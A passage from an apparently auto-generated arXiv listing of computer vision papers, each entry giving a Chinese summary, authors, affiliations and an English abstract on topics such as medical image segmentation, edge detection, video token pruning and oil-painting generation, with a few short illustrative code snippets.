Abstract:General Multimodal Large Language Models (MLLMs) often underperform in capturing domain-specific nuances in medical diagnosis, trailing behind fully supervised baselines. Although fine-tuning provides a remedy, the high costs of expert annotation and massive computational overhead limit its scalability. To bridge this gap without updating the weights of the pre-trained backbone of the MLLM, we propose a Clinician Mimetic Workflow. This is a novel In-Context Learning (ICL) framework designed to synergize Discriminative Exemplar Coreset Selection (DECS) and Self-Refined Experience Summarization (SRES). Specifically, DECS simulates a clinician’s ability to reference “anchor cases” by selecting discriminative visual coresets from noisy data at the computational level; meanwhile, SRES mimics the cognition and reflection in clinical diagnosis by distilling diverse rollouts into a dynamic textual Experience Bank. Extensive evaluation across all 12 datasets of the MedMNIST 2D benchmark demonstrates that our method outperforms zero-shot general and medical MLLMs. Simultaneously, it achieves performance levels comparable to fully supervised vision models and domain-specific fine-tuned MLLMs, setting a new benchmark for parameter-efficient medical in-context learning. Our code is available at an anonymous repository: this https URL.
[CV-134] Look Compare and Draw: Differential Query Transformer for Automatic Oil Painting
【速读】:该论文旨在解决自动油画生成中因重复和常见笔触导致的美学效果下降问题(即生成结果缺乏动态性和表现力)。其解决方案的关键在于引入差分图像分析(differential image analysis),并设计了差分查询Transformer(DQ-Transformer)架构,通过融合位置编码的差分图像表示来引导笔触预测过程,从而增强模型对局部细节的敏感性,实现更精细、更具艺术性的笔触生成。此外,结合对抗训练进一步提升笔触预测精度,显著改善合成画作的整体真实感与艺术一致性。
链接: https://arxiv.org/abs/2603.27720
作者: Lingyu Liu,Yaxiong Wang,Li Zhu,Lizi Liao,Zhedong Zheng
机构: Xi’an Jiaotong University (西安交通大学); Hefei University of Technology (合肥工业大学); Singapore Management University (新加坡管理大学); University of Macau (澳门大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Multimedia (cs.MM)
备注: this https URL
Abstract:This work introduces a new approach to automatic oil painting that emphasizes the creation of dynamic and expressive brushstrokes. A pivotal challenge lies in mitigating the duplicate and common-place strokes, which often lead to less aesthetic outcomes. Inspired by the human painting process, i.e., observing, comparing, and drawing, we incorporate differential image analysis into a neural oil painting model, allowing the model to effectively concentrate on the incremental impact of successive brushstrokes. To operationalize this concept, we propose the Differential Query Transformer (DQ-Transformer), a new architecture that leverages differentially derived image representations enriched with positional encoding to guide the stroke prediction process. This integration enables the model to maintain heightened sensitivity to local details, resulting in more refined and nuanced stroke generation. Furthermore, we incorporate adversarial training into our framework, enhancing the accuracy of stroke prediction and thereby improving the overall realism and fidelity of the synthesized paintings. Extensive qualitative evaluations, complemented by a controlled user study, validate that our DQ-Transformer surpasses existing methods in both visual realism and artistic authenticity, typically achieving these results with fewer strokes. The stroke-by-stroke painting animations are available on our project website.
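DQ-Transformer 的出发点是模拟人类作画的"观察、比较、再下笔":以目标图与当前画布的差分图作为笔触预测的引导信号。下面用一个极简的 Python 草图示意"差分图像"这一输入的构造方式(函数名与玩具数据均为本文假设,仅用于说明思路,并非论文实现):

```python
import numpy as np

def differential_input(canvas, target):
    """以目标图与当前画布的逐像素差分作为"观察-比较"信号(示意)。"""
    return target.astype(float) - canvas.astype(float)

canvas = np.zeros((2, 2))                    # 空白画布
target = np.array([[1.0, 0.0], [0.0, 1.0]])  # 目标图
diff = differential_input(canvas, target)    # 非零处即尚需补笔的区域
```

论文中该差分表示还会叠加位置编码后再送入 Transformer,此处仅示意其最核心的"增量"思想。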
[CV-135] RAP: Retrieve, Adapt and Prompt-Fit for Training-Free Few-Shot Medical Image Segmentation IJCNN2026
【速读】:该论文旨在解决少样本医学图像分割(Few-shot Medical Image Segmentation, FSMIS)中现有方法过度依赖稀疏标注的语义对应关系,而忽视了医学影像中目标解剖结构具有跨患者和采集设备重复出现的高频形态特征(如边界几何形状与空间布局)的问题。解决方案的关键在于提出一种无需训练的框架RAP,其核心创新包括:首先利用DINOv3特征从档案库中检索形态兼容的支持样本以降低单支持样本选择的脆弱性;其次通过拟合边界感知的结构线索将检索到的支持掩码适配至查询图像,生成在域偏移下仍保持解剖一致性的预掩码;最后基于Voronoi划分采样正点、扇形区域采样负点,将预掩码转化为提示输入Segment Anything Model 2(SAM2),实现无需微调的最终精修。该方法证明了显式结构拟合与检索增强提示相结合是实现鲁棒少样本医学图像分割的有效途径。
链接: https://arxiv.org/abs/2603.27705
作者: Zhihao Mao,Bangpu Chen
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: This paper has been accepted by IJCNN 2026
Abstract:Few-shot medical image segmentation (FSMIS) has achieved notable progress, yet most existing methods mainly rely on semantic correspondences from scarce annotations while under-utilizing a key property of medical imagery: anatomical targets exhibit repeatable high-frequency morphology (e.g., boundary geometry and spatial layout) across patients and acquisitions. We propose RAP, a training-free framework that retrieves, adapts, and prompts Segment Anything Model 2 (SAM2) for FSMIS. First, RAP retrieves morphologically compatible supports from an archive using DINOv3 features to reduce brittleness in single-support choice. Second, it adapts the retrieved support mask to the query by fitting boundary-aware structural cues, yielding an anatomy-consistent pre-mask under domain shifts. Third, RAP converts the pre-mask into prompts by sampling positive points via Voronoi partitioning and negative points via sector-based sampling, and feeds them into SAM2 for final refinement without any fine-tuning. Extensive experiments on multiple medical segmentation benchmarks show that RAP consistently surpasses prior FSMIS baselines and achieves state-of-the-art performance. Overall, RAP demonstrates that explicit structural fitting combined with retrieval-augmented prompting offers a simple and effective route to robust training-free few-shot medical segmentation.
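RAP 的第一步是用 DINOv3 特征在档案库中检索形态相容的支持样本,以降低单一支持样本选择的脆弱性。下面用一个最小化的 Python 草图示意这一余弦相似度检索步骤(特征以普通向量代替,函数名与玩具数据均为本文假设,并非论文官方实现):

```python
import numpy as np

def retrieve_supports(query_feat, archive_feats, k=1):
    """按余弦相似度从档案库中检索与查询最相近的 k 个支持样本(返回下标)。"""
    q = query_feat / np.linalg.norm(query_feat)
    a = archive_feats / np.linalg.norm(archive_feats, axis=1, keepdims=True)
    sims = a @ q                   # 每个支持样本与查询的余弦相似度
    return np.argsort(-sims)[:k]   # 相似度最高的 k 个下标

# 玩具示例:3 个支持样本的特征,查询方向与第 2 个(下标 1)最接近
archive = np.array([[1.0, 0.0], [0.0, 1.0], [0.7, 0.7]])
query = np.array([0.1, 2.0])
best = retrieve_supports(query, archive, k=1)
```

检索得到的支持掩码随后才进入论文的结构适配与 SAM2 提示阶段,此处仅示意检索环节。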
[CV-136] Ink Detection from Surface Topography of the Herculaneum Papyri
【速读】:该论文旨在解决赫库兰尼姆纸草卷(Herculaneum papyri)中碳基墨水在碳化纸张上难以通过X射线辐射成像或断层扫描识别的问题,因为两者均以碳为主,缺乏密度或成分差异带来的对比度。其解决方案的关键在于提出并验证了基于表面形貌(surface morphology)的判别机制:利用高分辨率三维光学轮廓测量数据训练机器学习模型,从机械展开的纸草卷中区分墨迹区域与未书写区域。研究表明,仅靠高分辨率地形信息即可提供可用于墨迹检测的有效信号,且分割性能随横向采样率降低而下降,揭示了需解析的空间尺度特征,从而为后续通过X射线断层扫描实现闭合卷轴的形态学读取提供了空间分辨率目标依据。
链接: https://arxiv.org/abs/2603.27698
作者: Giorgio Angelotti,Federica Nicolardi,Paul Henderson,W. Brent Seales
机构: Vesuvius Challenge, USA; Università degli Studi di Napoli Federico II, Italy; University of Glasgow, Scotland, UK; EduceLab, University of Kentucky, USA
类目: Computer Vision and Pattern Recognition (cs.CV); Digital Libraries (cs.DL)
备注: 9 pages, 3 figures, 2 tables. Currently under review
Abstract:Reading the Herculaneum papyri is challenging because both the scrolls and the ink, which is carbon-based, are carbonized. In X-ray radiography and tomography, ink detection typically relies on density- or composition-driven contrast, but carbon ink on carbonized papyrus provides little attenuation contrast. Building on the morphological hypothesis, we show that the surface morphology of written regions contains enough signal to distinguish ink from papyrus. To this end, we train machine learning models on three-dimensional optical profilometry from mechanically opened Herculaneum papyri to separate inked and uninked areas. We further quantify how lateral sampling governs learnability and how a native-resolution model behaves on coarsened inputs. We show that high-resolution topography alone contains a usable signal for ink detection. Diminishing segmentation performance with decreasing lateral resolution provides insight into the characteristic spatial scales that must be resolved on our dataset to exploit the morphological signal. These findings inform spatial resolution targets for morphology-based reading of closed scrolls through X-ray tomography.
[CV-137] Can Unsupervised Segmentation Reduce Annotation Costs for Video Semantic Segmentation?
【速读】:该论文旨在解决视频语义分割(Video Semantic Segmentation)任务中对大量精细像素级标注数据的依赖问题,这类标注成本高昂且耗时。为降低标注成本,论文提出利用未标注视频帧和粗粒度标注(Coarse Annotations)作为辅助资源,结合先进的分割基础模型——Segment Anything Model (SAM) 和 Segment Anything Model 2 (SAM 2),自动化生成掩码(Mask Generation),从而显著减少人工标注需求。其解决方案的关键在于:通过合理使用未标注数据与粗标注信息,配合SAM系列模型的强大泛化能力,可在保持相近性能的前提下将标注工作量减少约三分之一;同时研究发现,数据集中帧的多样性(Variety of Frames)比帧的数量(Number of Frames)对最终性能影响更大。
链接: https://arxiv.org/abs/2603.27697
作者: Samik Some,Vinay P. Namboodiri
机构: IIT Kanpur(印度理工学院坎普尔分校); University of Bath(巴斯大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Published in ICVGIP 2025
Abstract:Present-day deep neural networks for video semantic segmentation require a large number of fine-grained pixel-level annotations to achieve the best possible results. Obtaining such annotations, however, is very expensive. On the other hand, raw, unannotated video frames are practically free to obtain. Similarly, coarse annotations, which do not require precise boundaries, are also much cheaper. This paper investigates approaches to reduce the annotation cost required for video segmentation datasets by utilising such resources. We show that using state-of-the-art segmentation foundation models, Segment Anything Model (SAM) and Segment Anything Model 2 (SAM 2), we can utilise both unannotated frames as well as coarse annotations to alleviate the effort required for manual annotation of video segmentation datasets by automating mask generation. Our investigation suggests that if used appropriately, we can reduce the need for annotation by a third with similar performance for video semantic segmentation. More significantly, our analysis suggests that the variety of frames in the dataset is more important than the number of frames for obtaining the best performance.
[CV-138] Customized Visual Storytelling with Unified Multimodal LLMs CVPR2026
【速读】:该论文旨在解决现有故事生成方法在多模态条件控制下的局限性问题,即大多数方法仅依赖文本输入,缺乏对角色身份(character identity)和场景背景的联合建模能力,且难以实现镜头类型(shot type)等影视语法层面的可控生成。解决方案的关键在于提出VstoryGen框架,通过整合文本描述、角色参考图像与背景参考图像,实现多模态驱动的故事流生成;同时引入基于参数高效提示调优(parameter-efficient prompt tuning)的镜头类型控制机制,在电影数据上训练以增强生成序列的影视语法一致性与多样性,从而提升故事生成的连贯性与视觉表现力。
链接: https://arxiv.org/abs/2603.27690
作者: Wei-Hua Li,Cheng Sun,Chu-Song Chen
机构: National Taiwan University (国立台湾大学); NVIDIA (英伟达)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Paper accepted to the CVPR 2026 Workshop on Generative AI for Storytelling (CVPRW)
Abstract:Multimodal story customization aims to generate coherent story flows conditioned on textual descriptions, reference identity images, and shot types. While recent progress in story generation has shown promising results, most approaches rely on text-only inputs. A few studies incorporate character identity cues (e.g., facial ID), but lack broader multimodal conditioning. In this work, we introduce VstoryGen, a multimodal framework that integrates descriptions with character and background references to enable customizable story generation. To enhance cinematic diversity, we introduce shot-type control via parameter-efficient prompt tuning on movie data, enabling the model to generate sequences that more faithfully reflect cinematic grammar. To evaluate our framework, we establish two new benchmarks that assess multimodal story customization from the perspectives of character and scene consistency, text-visual alignment, and shot-type control. Experiments demonstrate that VstoryGen achieves improved consistency and cinematic diversity compared to existing methods.
[CV-139] Gated Condition Injection without Multimodal Attention: Towards Controllable Linear-Attention Transformers
【速读】:该论文旨在解决基于扩散模型的可控图像生成在边缘设备上部署时面临的两大挑战:一是现有方法难以支持多种异构条件输入类型(如空间对齐与非对齐提示),二是传统控制框架(如ControlNet和OminiControl)在采用线性注意力架构(linear attention)的模型上收敛速度慢、效率低的问题。解决方案的关键在于提出一种专为线性注意力骨干网络(如SANA)设计的新型可控扩散框架,其核心是一个统一的门控条件模块(unified gated conditioning module),该模块通过双路径(dual-path)结构有效融合多类型条件输入,在保证生成质量的同时显著提升训练稳定性和收敛速度,从而实现高效且灵活的边缘端可控图像生成。
链接: https://arxiv.org/abs/2603.27666
作者: Yuhe Liu,Zhenxiong Tan,Yujia Hu,Songhua Liu,Xinchao Wang
机构: National University of Singapore (新加坡国立大学); Shanghai Jiao Tong University (上海交通大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Recent advances in diffusion-based controllable visual generation have led to remarkable improvements in image quality. However, these powerful models are typically deployed on cloud servers due to their large computational demands, raising serious concerns about user data privacy. To enable secure and efficient on-device generation, we explore in this paper controllable diffusion models built upon linear attention architectures, which offer superior scalability and efficiency, even on edge devices. Yet, our experiments reveal that existing controllable generation frameworks, such as ControlNet and OminiControl, either lack the flexibility to support multiple heterogeneous condition types or suffer from slow convergence on such linear-attention models. To address these limitations, we propose a novel controllable diffusion framework tailored for linear attention backbones like SANA. The core of our method lies in a unified gated conditioning module working in a dual-path pipeline, which effectively integrates multi-type conditional inputs, such as spatially aligned and non-aligned cues. Extensive experiments on multiple tasks and benchmarks demonstrate that our approach achieves state-of-the-art controllable generation performance based on linear-attention models, surpassing existing methods in terms of fidelity and controllability.
[CV-140] Test-Time Instance-Specific Parameter Composition: A New Paradigm for Adaptive Generative Modeling CVPR2026
【速读】:该论文旨在解决现有生成式模型(Generative Models)在面对不同输入时缺乏灵活性的问题,即这些模型通常依赖固定的预训练参数来处理所有输入,无法根据具体感知或想象情境动态调整其内部表示。为应对这一局限,作者提出了一种名为Composer的新范式,其核心创新在于在推理阶段引入实例特定的参数组合机制(instance-specific parameter composition),通过生成与输入条件相关的参数适配(parameter adaptations),将其注入预训练模型权重中,从而实现无需微调或重新训练的逐输入特化。该方法仅需一次适配即可支持多步生成过程,在保持极低计算和内存开销的同时显著提升输出质量与上下文相关性,推动生成模型从静态参数化向动态适应性设计演进。
链接: https://arxiv.org/abs/2603.27665
作者: Minh-Tuan Tran,Xuan-May Le,Quan Hung Tran,Mehrtash Harandi,Dinh Phung,Trung Le
机构: Monash University (莫纳什大学); The University of Melbourne (墨尔本大学); Meta Inc (Meta公司)
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: Accepted at CVPR 2026
Abstract:Existing generative models, such as diffusion and auto-regressive networks, are inherently static, relying on a fixed set of pretrained parameters to handle all inputs. In contrast, humans flexibly adapt their internal generative representations to each perceptual or imaginative context. Inspired by this capability, we introduce Composer, a new paradigm for adaptive generative modeling based on test-time instance-specific parameter composition. Composer generates input-conditioned parameter adaptations at inference time, which are injected into the pretrained model’s weights, enabling per-input specialization without fine-tuning or retraining. Adaptation occurs once prior to multi-step generation, yielding higher-quality, context-aware outputs with minimal computational and memory overhead. Experiments show that Composer substantially improves performance across diverse generative models and use cases, including lightweight/quantized models and test-time scaling. By leveraging input-aware parameter composition, Composer establishes a new paradigm for designing generative models that dynamically adapt to each input, moving beyond static parameterization.
[CV-141] LiDAR for Crowd Management: Applications Benefits and Future Directions
【速读】:该论文旨在解决公共安全场景下人群管理的智能化与精准化问题,其核心挑战在于如何高效、隐私友好且鲁棒地实现人群检测、计数、跟踪与行为分类。解决方案的关键在于利用激光雷达(LiDAR)技术的优势:相较于传统监控手段,LiDAR能够在多种天气条件下稳定运行,并提供高精度的三维空间信息,同时保障用户隐私(因其不采集可见光图像),从而为人群行为分析提供可靠的数据基础。此外,论文进一步提出四类关键任务的处理框架,并指出未来研究需聚焦于专用数据集构建、多传感器融合、人工智能算法集成及点云处理效率提升等方向,以推动LiDAR在实际公共安全应用中的落地。
链接: https://arxiv.org/abs/2603.27663
作者: Abdullah Khanfor(1),Chaima Zaghouani(2),Hakim Ghazzai(3),Ahmad Alsharoa(2),Gianluca Setti(3), ((1) the College of Computer Science and Information Systems, Najran University, (2) the College of Innovation & Technology, University of Michigan-Flint, (3) King Abdullah University of Science and Technology (KAUST))
机构: Najran University (纳杰兰大学); University of Michigan-Flint (密歇根大学弗林特分校); King Abdullah University of Science and Technology (阿卜杜拉国王科技大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 8 pages, 5 figures, 1 table
Abstract:Light Detection and Ranging (LiDAR) technology offers significant advantages for effective crowd management. This article presents LiDAR technology and highlights its primary advantages over other monitoring technologies, including enhanced privacy, performance in various weather conditions, and precise 3D mapping. We present a general taxonomy of four key tasks in crowd management: crowd detection, counting, tracking, and behavior classification, with illustrative examples of LiDAR applications for each task. We identify challenges and open research directions, including the scarcity of dedicated datasets, sensor fusion requirements, artificial intelligence integration, and processing needs for LiDAR point clouds. This article offers actionable insights for developing crowd management solutions tailored to public safety applications.
[CV-142] A Benchmarking Methodology to Assess Open-Source Video Large Language Models in Automatic Captioning of News Videos
【速读】:该论文旨在解决新闻视频自动文本描述生成(automatic news video captioning)任务中缺乏系统性评估的问题,特别是针对当前主流视频大语言模型(Video Large Language Models, VidLLMs)在新闻领域表现的量化分析不足。其解决方案的关键在于构建了一个包含两个互补基准数据集(智利电视新闻语料库和BBC新闻语料库)的全面评测框架,并引入两种新颖的保真度指标——主题保真度评分(Thematic Fidelity Score, TFS)和实体保真度评分(Entity Fidelity Score, EFS),以克服传统词法和语义指标(如METEOR、ROUGE-L、BERTScore等)对表面形式依赖性强、忽视静态帧信息及过度关注功能词等问题,从而更准确地衡量生成摘要在主题结构保留与关键实体覆盖方面的质量。实验表明,Gemma 3在多数维度上表现最优,Qwen-VL次之,验证了所提方法的有效性。
链接: https://arxiv.org/abs/2603.27662
作者: David Miranda Paredes,Jose M. Saavedra,Marcelo Pizarro
机构: DeepCVL.ai; Universidad del Desarrollo (智利发展大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:News videos are among the most prevalent content types produced by television stations and online streaming platforms, yet generating textual descriptions to facilitate indexing and retrieval largely remains a manual process. Video Large Language Models (VidLLMs) offer significant potential to automate this task, but a comprehensive evaluation in the news domain is still lacking. This work presents a comparative study of eight state-of-the-art open-source VidLLMs for automatic news video captioning, evaluated on two complementary benchmark datasets: a Chilean TV news corpus (approximately 1,345 clips) and a BBC News corpus (9,838 clips). We employ lexical metrics (METEOR, ROUGE-L), semantic metrics (BERTScore, CLIPScore, Text Similarity, Mean Reciprocal Rank), and two novel fidelity metrics proposed in this work: the Thematic Fidelity Score (TFS) and Entity Fidelity Score (EFS). Our analysis reveals that standard metrics exhibit limited discriminative power for news video captioning due to surface-form dependence, static-frame insensitivity, and function-word inflation. TFS and EFS address these gaps by directly assessing thematic structure preservation and named-entity coverage in the generated captions. Results show that Gemma 3 achieves the highest overall performance across both datasets and most evaluation dimensions, with Qwen-VL as a consistent runner-up.
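实体保真度评分(EFS)旨在衡量生成描述对参考中命名实体的覆盖程度。摘要未给出精确公式,下面按"实体集合覆盖率"给出一个示意性实现(公式与函数名均为本文假设,论文的正式定义可能不同):

```python
def entity_fidelity(pred_entities, ref_entities):
    """示意性的实体保真度:生成描述命中参考命名实体的比例。"""
    pred, ref = set(pred_entities), set(ref_entities)
    if not ref:
        return 1.0  # 参考中无命名实体时视为满分
    return len(pred & ref) / len(ref)

ref = ["Chile", "BBC", "Santiago"]
pred = ["BBC", "Chile", "London"]
score = entity_fidelity(pred, ref)  # 命中 2 个参考实体,共 3 个
```

实际评测中实体抽取通常由 NER 模型完成,并可能对别名、大小写做归一化,这些细节此处从略。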
[CV-143] Amped: Adaptive Multi-stage Non-edge Pruning for Edge Detection
【速读】:该论文旨在解决基于Transformer的边缘检测方法在保持高像素级精度的同时,因输入分辨率提升导致计算量剧增、难以实际部署的问题。其解决方案的关键在于提出一种自适应多阶段非边缘剪枝框架(Adaptive Multi-stage non-edge Pruning framework for Edge Detection, Amped),通过早期识别并移除高置信度的非边缘token(non-edge tokens),显著降低计算复杂度(GFLOPs),同时几乎不损失检测性能(ODS F-measure仅下降0.4%)。此外,作者还设计了一个结构简洁但性能优异的Transformer模型Streamline Edge Detector (SED),进一步提升了效率与准确性之间的平衡。
链接: https://arxiv.org/abs/2603.27661
作者: Yuhan Gao,Xinqing Li,Xin He,Bing Li,Xinzhong Zhu,Ming-Ming Cheng,Yun Liu
机构: Nankai University (南开大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Edge detection is a fundamental image analysis task that underpins numerous high-level vision applications. Recent advances in Transformer architectures have significantly improved edge quality by capturing long-range dependencies, but this often comes with computational overhead. Achieving higher pixel-level accuracy requires increased input resolution, further escalating computational cost and limiting practical deployment. Building on the strong representational capacity of recent Transformer-based edge detectors, we propose an Adaptive Multi-stage non-edge Pruning framework for Edge Detection (Amped). Amped identifies high-confidence non-edge tokens and removes them as early as possible to substantially reduce computation, thus retaining high accuracy while cutting GFLOPs and accelerating inference with minimal performance loss. Moreover, to mitigate the structural complexity of existing edge detection networks and facilitate their integration into real-world systems, we introduce a simple yet high-performance Transformer-based model, termed Streamline Edge Detector (SED). Applied to both existing detectors and our SED, the proposed pruning strategy provides a favorable balance between accuracy and efficiency, reducing GFLOPs by up to 40% with only a 0.4% drop in ODS F-measure. In addition, despite its simplicity, SED achieves a state-of-the-art ODS F-measure of 86.5%. The code will be released.
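Amped 的核心操作是尽早移除高置信度的非边缘 token。下面的 Python 草图示意其中单个阶段的阈值剪枝(真实方法为多阶段、自适应阈值;此处阈值与数据均为本文假设,仅作说明):

```python
import numpy as np

def prune_non_edge(tokens, non_edge_conf, tau=0.9):
    """剪除被高置信度判为非边缘(conf > tau)的 token,返回保留结果与掩码。"""
    keep = non_edge_conf <= tau
    return tokens[keep], keep

tokens = np.arange(6)  # 6 个占位 token
conf = np.array([0.99, 0.2, 0.95, 0.5, 0.91, 0.1])  # 各 token 的非边缘置信度
kept, mask = prune_non_edge(tokens, conf, tau=0.9)
```

在多阶段设置下,上述操作在网络的不同深度重复执行,使后续层只在逐渐变小的 token 集合上计算,从而降低 GFLOPs。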
[CV-144] V-CAST: Video Curvature-Aware Spatio-Temporal Pruning for Efficient Video Large Language Models
【速读】:该论文旨在解决视频大语言模型(VideoLLMs)在长视频上下文推理中因预填充阶段存在大量冗余视觉标记而导致的效率瓶颈问题。核心挑战在于现有令牌压缩方法在时空信息覆盖上的不足,尤其是通过粗粒度帧级分配或场景分割引入的不连续覆盖,以及在MRoPE风格离散(t,h,w)绑定下令牌合并导致的时空坐标错位。解决方案的关键是提出一种无需训练、可即插即用的剪枝策略V-CAST(Video Curvature-Aware Spatio-Temporal Pruning),其将令牌压缩建模为轨迹近似问题,引入基于曲率引导的时间分配模块以动态分配每帧令牌预算至语义转折点和事件边界,并采用双锚点空间选择机制保留高熵视觉证据而不依赖注意力机制,同时保持保留令牌原始坐标以维持位置对齐。
链接: https://arxiv.org/abs/2603.27650
作者: Xinying Lin,Xuyang Liu,Yiyu Wang,Teng Ma,Wenqi Ren
机构: Shenzhen Campus of Sun Yat-sen University (中山大学深圳校区); Shenzhen Loop Area Institute (深圳环区研究所); Sichuan University (四川大学); EPIC Lab, Shanghai Jiao Tong University (上海交通大学EPIC实验室)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Code: this https URL
Abstract:Video large language models (VideoLLMs) show strong capability in video understanding, yet long-context inference is still dominated by massive redundant visual tokens in the prefill stage. We revisit token compression for VideoLLMs under a tight budget and identify a key bottleneck, namely insufficient spatio-temporal information coverage. Existing methods often introduce discontinuous coverage through coarse per-frame allocation or scene segmentation, and token merging can further misalign spatio-temporal coordinates under MRoPE-style discrete (t,h,w) bindings. To address these issues, we propose V-CAST (Video Curvature-Aware Spatio-Temporal Pruning), a training-free, plug-and-play pruning policy for long-context video inference. V-CAST casts token compression as a trajectory approximation problem and introduces a curvature-guided temporal allocation module that routes per-frame token budgets to semantic turns and event boundaries. It further adopts a dual-anchor spatial selection mechanism that preserves high-entropy visual evidence without attention intervention, while keeping retained tokens at their original coordinates to maintain positional alignment. Extensive experiments across multiple VideoLLMs of different architectures and scales demonstrate that V-CAST achieves 98.6% of the original performance, outperforms the second-best method by +1.1% on average, and reduces peak memory and total latency to 86.7% and 86.4% of vanilla Qwen3-VL-8B-Instruct.
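V-CAST 将 token 压缩视为轨迹近似问题,按帧特征轨迹的曲率把更多 token 预算分给语义转折与事件边界处。下面用相邻差分的转角作为离散曲率,给出一个示意性的逐帧预算分配草图(曲率的具体定义与归一化方式为本文假设,并非论文实现):

```python
import numpy as np

def curvature_budget(frame_feats, total_budget):
    """按帧特征轨迹的离散曲率(相邻差分方向的转角)分配每帧 token 预算(示意)。"""
    diffs = np.diff(frame_feats, axis=0)  # 相邻帧特征差分
    diffs /= np.linalg.norm(diffs, axis=1, keepdims=True) + 1e-8
    # 转角 = 1 - 相邻差分方向的余弦;首尾帧曲率记为 0
    turn = 1.0 - np.sum(diffs[1:] * diffs[:-1], axis=1)
    curv = np.concatenate([[0.0], turn, [0.0]])
    weights = curv + 1e-6  # 避免全零权重
    weights /= weights.sum()
    budget = np.floor(weights * total_budget).astype(int)
    budget[np.argmax(weights)] += total_budget - budget.sum()  # 余数补给曲率最大的帧
    return budget

# 玩具轨迹:在第 3 帧(下标 2)处方向急转,应分得最多预算
feats = np.array([[0, 0], [1, 0], [2, 0], [2, 1], [2, 2]], dtype=float)
budget = curvature_budget(feats, total_budget=10)
```

论文在此基础上还配合双锚点空间选点,并保持保留 token 的原始 (t,h,w) 坐标以维持位置对齐。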
[CV-145] OpenDPR: Open-Vocabulary Change Detection via Vision-Centric Diffusion-Guided Prototype Retrieval for Remote Sensing Imagery CVPR2026
【速读】:该论文旨在解决开放词汇变化检测(Open-vocabulary Change Detection, OVCD)中两大核心瓶颈问题:一是类别识别误差,源于视觉语言模型(Vision-Language Models, VLMs)基于图像-文本匹配机制在细粒度地物类别表征上的局限性;二是变化定位不准,由于视觉基础模型(Visual Foundation Models, VFMs)缺乏对变化区域的先验知识。解决方案的关键在于提出一种无需训练的、以视觉为中心的扩散引导原型检索框架 OpenDPR,其通过扩散模型离线构建目标类别的多样化原型,并在推理阶段于视觉空间内进行相似性检索,从而提升类别识别准确性;同时设计了一个空间到变化的弱监督模块 S2C,利用 VFMs 强大的空间建模能力来增强变化定位性能,集成预训练 S2C 后得到弱监督变体 OpenDPR-W,显著提升了 OVCD 在两种监督模式下的性能表现。
链接: https://arxiv.org/abs/2603.27645
作者: Qi Guo,Jue Wang,Yinhe Liu,Yanfei Zhong
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted by CVPR 2026
Abstract:Open-vocabulary change detection (OVCD) seeks to recognize arbitrary changes of interest by enabling generalization beyond a fixed set of predefined classes. We reformulate OVCD as a two-stage pipeline: first generate class-agnostic change proposals using visual foundation models (VFMs) such as SAM and DINOv2, and then perform category identification with vision-language models (VLMs) such as CLIP. We reveal that category identification errors are the primary bottleneck of OVCD, mainly due to the limited ability of VLMs based on image-text matching to represent fine-grained land-cover categories. To address this, we propose OpenDPR, a training-free vision-centric diffusion-guided prototype retrieval framework. OpenDPR leverages diffusion models to construct diverse prototypes for target categories offline, and to perform similarity retrieval with change proposals in the visual space during inference. The secondary bottleneck lies in change localization, due to the inherent lack of change priors in VFMs. To bridge this gap, we design a spatial-to-change weakly supervised change detection module named S2C to adapt their strong spatial modeling capabilities for change localization. Integrating the pretrained S2C into OpenDPR leads to an optional weakly supervised variant named OpenDPR-W, which further improves OVCD with minimal supervision. Experimental results on four benchmark datasets demonstrate that the proposed methods achieve state-of-the-art performance under both supervision modes. Code is available at this https URL.
[CV-146] OPRO: Orthogonal Panel-Relative Operators for Panel-Aware In-Context Image Generation CVPR2026
【速读】:该论文旨在解决预训练扩散Transformer在面板感知的上下文图像生成任务中,如何实现参数高效适配的问题。其核心挑战在于,在保持模型原有性能的前提下,引入少量可学习参数以适应不同面板(panel)间的条件差异,同时不破坏模型已有的内部特征几何结构和面板内合成行为。解决方案的关键在于:将可学习的、面向特定面板的正交算子(orthogonal operators)叠加到冻结的位置编码(positional encodings)上,从而在保证等距性(isometry)——即保留内部特征几何结构——和同面板不变性(same-panel invariance)——即维持预训练模型在单个面板内的合成特性——的基础上,实现对不同面板间关系的有效建模。该方法不依赖于特定的位置编码设计,具有跨多种位置编码机制的泛化能力,并显著提升了基于上下文图像的指令编辑(instructional editing)流水线的效果。
链接: https://arxiv.org/abs/2603.27637
作者: Sanghyeon Lee,Minwoo Lee,Euijin Shin,Kangyeol Kim,Seunghwan Choi,Jaegul Choo
机构: Korea Advanced Institute of Science and Technology (KAIST)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to CVPR 2026. 16 pages, 9 figures. Includes Supplementary Material
Abstract:We introduce a parameter-efficient adaptation method for panel-aware in-context image generation with pre-trained diffusion transformers. The key idea is to compose learnable, panel-specific orthogonal operators onto the backbone’s frozen positional encodings. This design provides two desirable properties: (1) isometry, which preserves the geometry of internal features, and (2) same-panel invariance, which maintains the model’s pre-trained intra-panel synthesis behavior. Through controlled experiments, we demonstrate that the effectiveness of our adaptation method is not tied to a specific positional encoding design but generalizes across diverse positional encoding regimes. By enabling effective panel-relative conditioning, the proposed method consistently improves in-context image-based instructional editing pipelines, including state-of-the-art approaches.
[CV-147] ContraMap: Contrastive Uncertainty Mapping for Robot Environment Representation
【速读】:该论文旨在解决机器人感知中如何在预测场景结构的同时,准确识别出因观测稀疏或缺失而导致的不可靠区域的问题(即不确定性估计)。传统方法往往难以实时提供空间一致的不确定性量化,而贝叶斯方法计算成本高。解决方案的关键在于提出ContraMap——一种对比连续映射方法,通过引入显式的“不确定性类”(uncertainty class),利用合成噪声样本进行训练,将未观测区域建模为一个对比类别,从而实现无需贝叶斯推断即可联合完成环境预测与空间不确定性估计。该方法基于混合模型视角,证明不确定性类的概率是距离感知不确定性代理的单调函数,从而保证了不确定性估计的空间一致性与高效性。
链接: https://arxiv.org/abs/2603.27632
作者: Chi Cuong Le,Weiming Zhi
机构: University of Sydney (悉尼大学)
